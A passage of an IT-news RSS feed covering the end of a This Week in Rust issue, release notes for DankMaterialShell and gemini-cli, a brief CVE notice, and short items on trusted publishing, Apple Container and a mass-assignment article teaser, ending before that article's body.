<td>[-8.4%, -0.1%]</td>
<td>11</td>
</tr>
<tr>
<td>All ❌✅ (primary)</td>
<td>-0.9%</td>
<td>[-8.4%, 0.2%]</td>
<td>10</td>
</tr>
</tbody>
</table>
<p>1 Regression, 1 Improvement, 4 Mixed; 3 of them in rollups
17 artifact comparisons made in total</p>
<p><a href="https://github.com/rust-lang/rustc-perf/blob/9f1bc6e374b5ae202366df1cbef850b79be8c641/triage/2026/2026-07-06.md">Full report here</a></p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#approved-rfcs"></a><a href="https://github.com/rust-lang/rfcs/commits/master">Approved RFCs</a></h5>
<p>Changes to Rust follow the Rust <a href="https://github.com/rust-lang/rfcs#rust-rfcs">RFC (request for comments) process</a>. These
are the RFCs that were approved for implementation this week:</p>
<ul>
<li><em>No RFCs were approved this week.</em></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#final-comment-period">Final Comment Period</a></h5>
<p>Every week, <a href="https://www.rust-lang.org/team.html">the team</a> announces the 'final comment period' for RFCs and key PRs
which are reaching a decision. Express your opinions now.</p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#tracking-issues-prs">Tracking Issues &amp; PRs</a></h6>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust"></a><a href="https://github.com/rust-lang/rust/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Rust</a>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158522">Lint against invalid POSIX symbol definitions</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158325">Document NonNull layout guarantees</a></li>
<li><a href="https://github.com/rust-lang/rust/issues/112811">Tracking Issue for <code>slice_split_once</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler-team-mcps-only"></a><a href="https://github.com/rust-lang/compiler-team/issues?q=label%3Amajor-change%20label%3Afinal-comment-period%20state%3Aopen">Compiler Team</a> <a href="https://forge.rust-lang.org/compiler/mcp.html">(MCPs only)</a>
<ul>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1011">Let the OS handle stack growth</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1010">Add <code>target_feature_available_at_call_site</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#language-reference"></a><a href="https://github.com/rust-lang/reference/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Reference</a>
<ul>
<li><a href="https://github.com/rust-lang/reference/pull/2293">Empty repr(Rust) enums are ZSTs</a></li>
</ul>
<p><em>No Items entered Final Comment Period this week for
<a href="https://github.com/rust-lang/cargo/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/lang-team/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Team</a>,
<a href="https://github.com/rust-lang/leadership-council/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Leadership Council</a>,
<a href="https://github.com/rust-lang/rfcs/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Rust RFCs</a> or
<a href="https://github.com/rust-lang/unsafe-code-guidelines/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Unsafe Code Guidelines</a>.</em></p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#new-and-updated-rfcs"></a><a href="https://github.com/rust-lang/rfcs/pulls">New and Updated RFCs</a></h5>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3982">Update RFC template</a></li>
<li><a href="https://github.com/rust-lang/rfcs/pull/3981">RFC: Store registry tokens in the OS credential store by default</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#upcoming-events">Upcoming Events</a></h4>
<p>Rusty Events between 2026-07-08 - 2026-08-05 🦀</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#virtual">Virtual</a></h5>
<ul>
<li>2026-07-08 | Virtual (Cardiff, GB) | <a href="https://www.meetup.com/rust-and-c-plus-plus-in-cardiff/events/">Rust and C++ Cardiff</a></li>
<li><a href="https://www.meetup.com/rust-and-c-plus-plus-in-cardiff/events/315506435/"><strong>Operating Systems Book Club: Introduction + Processes</strong></a></li>
<li>2026-07-08 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/jv9lom12"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-07-09 | Virtual (Nürnberg, DE) | <a href="https://www.meetup.com/rust-noris/events/">Rust Nuremberg</a></li>
<li><a href="https://www.meetup.com/rust-noris/events/315517604/"><strong>Rust Nürnberg online</strong></a></li>
<li>2026-07-14 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a></li>
<li><a href="https://www.meetup.com/dallasrust/events/310254778/"><strong>Second Tuesday</strong></a></li>
<li>2026-07-15 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/21k797xr"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a></li>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a></li>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
<li>2026-07-16 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a></li>
<li><a href="https://www.meetup.com/rust-berlin/events/312045926/"><strong>Rust Hack and Learn</strong></a></li>
<li>2026-07-19 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a></li>
<li><a href="https://www.meetup.com/dallasrust/events/314329045/"><strong>Rust Deep Learning: Third Sunday</strong></a></li>
<li>2026-07-21 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a></li>
<li><a href="https://www.meetup.com/women-in-rust/events/315102297/"><strong>Lunch &amp; Learn: Learning Rust as First Programming Language</strong></a></li>
<li>2026-07-21 | Virtual (Washington, DC, US) | <a href="https://www.meetup.com/rustdc">Rust DC</a></li>
<li><a href="https://www.meetup.com/rustdc/events/315279653/"><strong>Mid-month Rustful</strong></a></li>
<li>2026-07-22 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/hd8mlw56"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-07-28 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a></li>
<li><a href="https://www.meetup.com/dallasrust/events/310254777/"><strong>Fourth Tuesday</strong></a></li>
<li>2026-07-29 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/uo5ek1f4"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-07-30 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin/events/">Rust Berlin</a></li>
<li><a href="https://www.meetup.com/rust-berlin/events/312045928/"><strong>Rust Hack and Learn</strong></a></li>
<li>2026-08-02 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust/events/">Dallas Rust User Meetup</a></li>
<li><a href="https://www.meetup.com/dallasrust/events/314095294/"><strong>Rust Deep Learning: First Sunday</strong></a></li>
<li>2026-08-04 | Virtual (London, GB) | <a href="https://www.meetup.com/women-in-rust/events/">Women in Rust</a></li>
<li><a href="https://www.meetup.com/women-in-rust/events/315213885/"><strong>👋 Community Catch Up</strong></a></li>
<li>2026-07-29 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/ii2jrwva"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-08-05 | Virtual (Indianapolis, IN, US) | <a href="https://www.meetup.com/indyrs/events/">Indy Rust</a></li>
<li><a href="https://www.meetup.com/indyrs/events/315210367/"><strong>Indy.rs - with Social Distancing</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#asia">Asia</a></h5>
<ul>
<li>2026-07-18 | Bangalore, IN | <a href="https://hasgeek.com/rustbangalore">Rust Bangalore</a></li>
<li><a href="https://hasgeek.com/rustbangalore/july-2026-rustacean-meetup/"><strong>July 2026 Rustacean Meetup</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#africa">Africa:</a></h5>
<ul>
<li>2026-07-14 | Johannesburg, ZA | <a href="https://www.meetup.com/johannesburg-rust-meetup/events/">Johannesburg Rust Meetup</a></li>
<li><a href="https://www.meetup.com/johannesburg-rust-meetup/events/315573758/"><strong>Debugging a production grade Open Source Rust crate</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#europe">Europe</a></h5>
<ul>
<li>2026-07-08 | Dublin, IE | <a href="https://www.meetup.com/rust-dublin">Rust Dublin</a></li>
<li><a href="https://www.meetup.com/rust-dublin/events/315150327/"><strong>Join us live and INPERSON for Rust 262</strong></a></li>
<li>2026-07-09 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin/events/">Rust Berlin</a></li>
<li><a href="https://www.meetup.com/rust-berlin/events/315585121/"><strong>Rust Berlin on location 🏳️‍🌈 - Edition 015</strong></a></li>
<li>2026-07-09 | Frankfurt, DE | <a href="https://www.meetup.com/rust-rhein-main/events/">Rust Rhein-Main</a></li>
<li><a href="https://www.meetup.com/rust-rhein-main/events/315366165/"><strong>Building Cross Platform Applications with Ply</strong></a></li>
<li>2026-07-09 | Switzerland, CH | <a href="https://www.posttenebraslab.ch/wiki/events/start">PostTenebrasLab</a></li>
<li><a href="https://www.posttenebraslab.ch/wiki/events/monthly_meeting/rust_meetup"><strong>Rust Meetup Geneva</strong></a></li>
<li>2026-07-15 | Dortmund, DE | <a href="https://www.meetup.com/rust-dortmund/events/">Rust Dortmund</a></li>
<li><a href="https://www.meetup.com/rust-dortmund/events/315496876/"><strong>Teach and Hack at Projektspeicher</strong></a></li>
<li>2026-07-21 | Leipzig, DE | <a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig">Rust - Modern Systems Programming in Leipzig</a></li>
<li><a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig/events/313816470/"><strong>Supercharge Rust funcs with implicit arguments and context-generic programming</strong></a></li>
<li>2026-07-23 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a></li>
<li><a href="https://www.meetup.com/rust-berlin/events/315484101/"><strong>Rust Berlin Talks: The next generation</strong></a></li>
<li>2026-07-23 | London, UK | <a href="https://www.meetup.com/london-rust-project-group">London Rust Project Group</a></li>
<li><a href="https://www.meetup.com/london-rust-project-group/events/315366453/"><strong>Rama modular service framework for Rust</strong></a></li>
<li>2026-07-23 | Paris, FR | <a href="https://www.meetup.com/rust-paris">Rust Paris</a></li>
<li><a href="https://www.meetup.com/rust-paris/events/315309633/"><strong>Rust meetup #87</strong></a></li>
<li>2026-07-30 | Manchester, GB | <a href="https://www.meetup.com/rust-manchester/events/">Rust Manchester</a></li>
<li><a href="https://www.meetup.com/rust-manchester/events/315037685/"><strong>Rust Manchester July Code Night</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#north-america">North America</a></h5>
<ul>
<li>2026-07-09 | Lehi, UT, US | <a href="https://www.meetup.com/utah-rust">Utah Rust</a></li>
<li><a href="https://www.meetup.com/utah-rust/events/314696647/"><strong>Utah Rust July Meetup</strong></a></li>
<li>2026-07-09 | Mountain View, CA, US | <a href="https://www.meetup.com/hackerdojo/events/">Hacker Dojo</a></li>
<li><a href="https://www.meetup.com/hackerdojo/events/315338107/"><strong>RUST MEETUP at HACKER DOJO</strong></a></li>
<li>2026-07-11 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/315225865/"><strong>MIT Rust Lunch, July 11</strong></a></li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a></li>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a></li>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
<li>2026-07-18 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/315225872/"><strong>North End Rust Lunch, July 18</strong></a></li>
<li>2026-07-21 | San Francisco, CA, US | <a href="https://www.meetup.com/san-francisco-rust-study-group">San Francisco Rust Study Group</a></li>
<li><a href="https://www.meetup.com/san-francisco-rust-study-group/events/314997214/"><strong>Rust Hacking in Person</strong></a></li>
<li>2026-07-22 | Austin, TX, US | <a href="https://www.meetup.com/rust-atx">Rust ATX</a></li>
<li><a href="https://www.meetup.com/rust-atx/events/xvkdgtyjckbdc/"><strong>Rust Lunch - Fareground</strong></a></li>
<li>2026-07-22 | Los Angeles, CA, US | <a href="https://www.meetup.com/rust-los-angeles">Rust Los Angeles</a></li>
<li><a href="https://www.meetup.com/rust-los-angeles/events/315376271/"><strong>Rust LA: Rust in Distributed Systems with Flight Science!</strong></a></li>
<li>2026-07-25 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/315582650/"><strong>Porter Square Rust Lunch, July 25</strong></a></li>
<li>2026-07-25 | Brooklyn, NY, US | <a href="https://flowercomputer.com/">Flower</a></li>
<li><a href="https://partiful.com/e/Vq9fyDNCMSO7ia4ulK5b"><strong>BOG-A-THON 2</strong></a></li>
<li>2026-07-30 | Atlanta, GA, US | <a href="https://www.meetup.com/rust-atl/events/">Rust Atlanta</a></li>
<li><a href="https://www.meetup.com/rust-atl/events/313539329/"><strong>Rust-Atl</strong></a></li>
<li>2026-08-01 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/315582653/"><strong>Chinatown Rust Lunch, Aug 1</strong></a></li>
<li>2026-08-04 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/314660176/"><strong>Evening Boston Rust Meetup at Red Hat, Aug 4</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#oceania">Oceania</a></h5>
<ul>
<li>2026-07-09 | Brisbane City, QL, AU | <a href="https://www.meetup.com/rust-brisbane/events/">Rust Brisbane</a></li>
<li><a href="https://www.meetup.com/rust-brisbane/events/315563251/"><strong>Rust Brisbane • July 2026</strong></a></li>
<li>2026-07-21 | Barton, AU | <a href="https://www.meetup.com/rust-canberra">Canberra Rust User Group</a></li>
<li><a href="https://www.meetup.com/rust-canberra/events/315307280/"><strong>July Meetup</strong></a></li>
<li>2026-07-23 | Perth, AU | <a href="https://www.meetup.com/perth-rust-meetup-group">Rust Perth Meetup Group</a></li>
<li><a href="https://www.meetup.com/perth-rust-meetup-group/events/315451138/"><strong>Rust Perth: July Meetup!</strong></a></li>
<li>2026-07-30 | Melbourne, AU | <a href="https://www.meetup.com/rust-melbourne/events/">Rust Melbourne</a></li>
<li><a href="https://www.meetup.com/rust-melbourne/events/315039480/"><strong>Rust Melbourne July 2026</strong></a></li>
</ul>
<p>If you are running a Rust event please add it to the <a href="https://www.google.com/calendar/embed?src=apd9vmbc22egenmtu5l6c5jbfc%40group.calendar.google.com">calendar</a> to get
it mentioned here. Please remember to add a link to the event too.
Email the <a href="mailto:community-team@rust-lang.org">Rust Community Team</a> for access.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#jobs">Jobs</a></h4>
<p>Please see the latest <a href="https://www.reddit.com/r/rust/comments/1ttbtf5/official_rrust_whos_hiring_thread_for_jobseekers/">Who's Hiring thread on r/rust</a></p>
<h3><a class="toclink" href="https://this-week-in-rust.org/atom.xml#quote-of-the-week">Quote of the Week</a></h3>
<blockquote>
<p>if a ptr is dereferenced in a forest and nobody hears it, is it sound?</p>
</blockquote>
<p>– <a href="https://users.rust-lang.org/t/does-the-indirection-of-a-pointer-immediately-create-a-reference/141071/10">Kornel on rust-users</a></p>
<p>Thanks to <a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328/1785">Cerber-Ursi</a> for the suggestion!</p>
<p><a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328">Please submit quotes and vote for next week!</a></p>
<p>This Week in Rust is edited by:</p>
<ul>
<li><a href="https://github.com/nellshamrell">nellshamrell</a></li>
<li><a href="https://github.com/llogiq">llogiq</a></li>
<li><a href="https://github.com/ericseppanen">ericseppanen</a></li>
<li><a href="https://github.com/extrawurst">extrawurst</a></li>
<li><a href="https://github.com/U007D">U007D</a></li>
<li><a href="https://github.com/mariannegoldin">mariannegoldin</a></li>
<li><a href="https://github.com/bdillo">bdillo</a></li>
<li><a href="https://github.com/opeolluwa">opeolluwa</a></li>
<li><a href="https://github.com/bnchi">bnchi</a></li>
<li><a href="https://github.com/KannanPalani57">KannanPalani57</a></li>
<li><a href="https://github.com/tzilist">tzilist</a></li>
</ul>
<p><em>Email list hosting is sponsored by <a href="https://foundation.rust-lang.org/">The Rust Foundation</a></em></p>
<p><small><a href="https://www.reddit.com/r/rust/comments/1ureq0r/this_week_in_rust_659/">Discuss on r/rust</a></small></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[DankMaterialShell (DMS) 1.5 "The Wolverine" Released - A Linux shell for Wayland Compositors]]></title>
<description><![CDATA[DMS v1.5 has officially been released. This is the largest DMS release to date and packs numerous new features, performance improvements, and broad changes/enhancements to the overall ecosystem. Highlights:  Frame and Connected Mode - An alternative UI for DMS that gives the option to connect all...]]></description>
<link>https://tsecurity.de/de/3655741/linux-tipps/dankmaterialshell-dms-15-the-wolverine-released-a-linux-shell-for-wayland-compositors/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655741/linux-tipps/dankmaterialshell-dms-15-the-wolverine-released-a-linux-shell-for-wayland-compositors/</guid>
<pubDate>Thu, 09 Jul 2026 03:54:28 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>DMS v1.5 has officially been released. This is the largest DMS release to date and packs numerous new features, performance improvements, and broad changes/enhancements to the overall ecosystem.</p> <p>Highlights:</p> <ul> <li><strong>Frame and Connected Mode</strong> - An alternative UI for DMS that gives the option to connect all layer-shell surfaces as a single unified-view. Brings with it more animation and theme options to customize the experience</li> <li><strong>Dank Calendar</strong> - A standalone app that supports events (VEVENT in CalDav), tasks (VTODO in CalDav) with numerous providers - Google, iCloud, Microsoft, Caldav, iCal stream, and Evolution Data Server, is integrated with DMS 1.5 widgets natively when it is running and available</li> <li><strong>Window Rules</strong> - Expanded significantly and support brought to Hyprland and MangoWM</li> <li><strong>New Shadow System</strong> - New shader-based shadow system replaces the CPU-heavy FBO shadows and brings numerous new options for configuration</li> <li><strong>XDG-Autostart Management</strong> - Manage desktop apps that autostart with your session. DMS is not launching these apps, it still depends on a session runner such as systemd or dex. But adding/managing these applications is now integrated</li> <li><strong>Default Applications</strong> - Manage default applications for various mime-types, as well as an enhanced DMS picker (for example, a menu that opens and allows you to choose Firefox, Chrome, Brave for opening links)</li> <li><strong>Plugin Ecosystem Enhancements</strong> - A forum, upvote system, and moderation system has been implemented for the DMS plugin registry which should aid greatly with finding high quality plugins, filtering plugins, and reporting issues with plugins.</li> <li><strong>Hyprland Lua Configuration</strong> - is now supported and all configurations managed by DMS are now written in the Lua format</li> <li><strong>MangoWM Support Enhanced</strong> - Better support for MangoWM - including default configuration options, window rule management, and using the new IPC interface instead of dwl-ipc protocol.</li> </ul> <p>There's a lot more than that, see the blog for the full details. Some distribution packages will trail behind the official release as maintainers need time to update their packages.</p> <p>Thanks to all the contributors and enjoy!</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/bbedward"> /u/bbedward </a> <br> <span><a href="https://danklinux.com/blog/v1-5-release">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1ur2ttk/dankmaterialshell_dms_15_the_wolverine_released_a/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Release v0.50.0]]></title>
<description><![CDATA[What's Changed

fix/verify release npm ci ignore scripts by @rmedranollamas in #28116
fix(ci): prevent workspace binary shadowing in release verification by @galdawave in #28132
Feat/tool registry discovery by @ved015 in #28113
fix(ci): prevent bad NPM releases and promote job crashes by @galdawa...]]></description>
<link>https://tsecurity.de/de/3655225/downloads/release-v0500/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655225/downloads/release-v0500/</guid>
<pubDate>Wed, 08 Jul 2026 20:45:48 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>fix/verify release npm ci ignore scripts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rmedranollamas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rmedranollamas">@rmedranollamas</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4731380905" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28116" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28116/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28116">#28116</a></li>
<li>fix(ci): prevent workspace binary shadowing in release verification by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galdawave/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galdawave">@galdawave</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4738727594" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28132" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28132/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28132">#28132</a></li>
<li>Feat/tool registry discovery by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ved015/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ved015">@ved015</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4728648296" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28113" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28113/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28113">#28113</a></li>
<li>fix(ci): prevent bad NPM releases and promote job crashes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galdawave/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galdawave">@galdawave</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4746204393" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28147" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28147/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28147">#28147</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/google-gemini/gemini-cli/compare/v0.49.0...v0.50.0"><tt>v0.49.0...v0.50.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-14471 | AWS MCP Gateway Registry up to 1.0.12 Retention Policy Management table_name neutralization (EUVD-2026-41939)]]></title>
<description><![CDATA[A vulnerability was found in AWS MCP Gateway Registry up to 1.0.12 and classified as critical. Affected is an unknown function of the component Retention Policy Management. Such manipulation of the argument table_name leads to improper neutralization.

This vulnerability is uniquely identified as...]]></description>
<link>https://tsecurity.de/de/3652207/sicherheitsluecken/cve-2026-14471-aws-mcp-gateway-registry-up-to-1012-retention-policy-management-tablename-neutralization-euvd-2026-41939/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652207/sicherheitsluecken/cve-2026-14471-aws-mcp-gateway-registry-up-to-1012-retention-policy-management-tablename-neutralization-euvd-2026-41939/</guid>
<pubDate>Tue, 07 Jul 2026 18:39:39 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/aws:mcp_gateway_registry">AWS MCP Gateway Registry up to 1.0.12</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. Affected is an unknown function of the component <em>Retention Policy Management</em>. Such manipulation of the argument <em>table_name</em> leads to improper neutralization.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-14471">CVE-2026-14471</a>. The attack can be launched remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[Woodruff: You shouldn't trust trusted publishing]]></title>
<description><![CDATA[William Woodruff, better known online as "yossarian", has published
a blog post to make the case that users should not place their trust
in trusted
publishing:


Trusted Publishing is a mechanism for establishing trust between an
external machine identity (like a CI/CD workflow) and one or more
p...]]></description>
<link>https://tsecurity.de/de/3651890/linux-tipps/woodruff-you-shouldnt-trust-trusted-publishing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651890/linux-tipps/woodruff-you-shouldnt-trust-trusted-publishing/</guid>
<pubDate>Tue, 07 Jul 2026 16:40:33 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>William Woodruff, better known online as "yossarian", has <a href="https://blog.yossarian.net/2026/07/07/You-shouldnt-trust-trusted-publishing">published</a>
a blog post to make the case that users should not place their trust
in <a href="https://docs.pypi.org/trusted-publishers/">trusted
publishing</a>:</p>

<blockquote class="bq">
<p>Trusted Publishing is a mechanism for establishing trust between an
external machine identity (like a CI/CD workflow) and one or more
projects on a package index/registry. The "trust" in "Trusted
Publishing" refers to that trust relationship, and not to anything
else.</p>

<p>It is not, and cannot be, a signal for package trust or
quality. You cannot use it to determine whether a package is safe or
"good," and PyPI consciously stymies attempts to misuse it for that
purpose by not rendering it as a "green checkmark" or anything else of
the sort.</p>

<p>Or as another framing: Trusted Publishing is just a form of
authentication. It doesn't tell you anything other than that an upload
was authenticated, which all uploads to PyPI are.</p>
</blockquote>

<p>LWN <a href="https://lwn.net/Articles/1076205/">covered</a> trusted
publishing in June.</p>

<p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Container: Open-source tool for Linux containers on the Mac]]></title>
<description><![CDATA[Developers on Apple silicon Macs have run Linux containers through software built around a single shared virtual machine for years. Apple’s open-source Container project gives each Linux workload its own lightweight virtual machine. Container is written in Swift and tuned for Apple silicon. It cr...]]></description>
<link>https://tsecurity.de/de/3650534/it-security-nachrichten/apple-container-open-source-tool-for-linux-containers-on-the-mac/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650534/it-security-nachrichten/apple-container-open-source-tool-for-linux-containers-on-the-mac/</guid>
<pubDate>Tue, 07 Jul 2026 07:24:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Developers on Apple silicon Macs have run Linux containers through software built around a single shared virtual machine for years. Apple’s open-source Container project gives each Linux workload its own lightweight virtual machine. Container is written in Swift and tuned for Apple silicon. It creates and runs Linux containers as lightweight virtual machines, and it works with OCI-compatible images, so a developer can pull from and push to any standard registry. Images built with it … <a href="https://www.helpnetsecurity.com/2026/07/07/apple-container-open-source-linux-mac/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/07/apple-container-open-source-linux-mac/">Apple Container: Open-source tool for Linux containers on the Mac</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mass Assignment and the Identity Drift: From Profile Edit to Insurance Takeover]]></title>
<description><![CDATA[No customer support call. No re-verification.Yet the name changes. The date of birth changes. The government ID number changes. But the eKYC status remains verified and every system that relies on that identity continue trusting the account as if nothing happened.Mass Assignment happens when an a...]]></description>
<link>https://tsecurity.de/de/3647965/hacking/mass-assignment-and-the-identity-drift-from-profile-edit-to-insurance-takeover/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647965/hacking/mass-assignment-and-the-identity-drift-from-profile-edit-to-insurance-takeover/</guid>
<pubDate>Mon, 06 Jul 2026 08:52:59 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
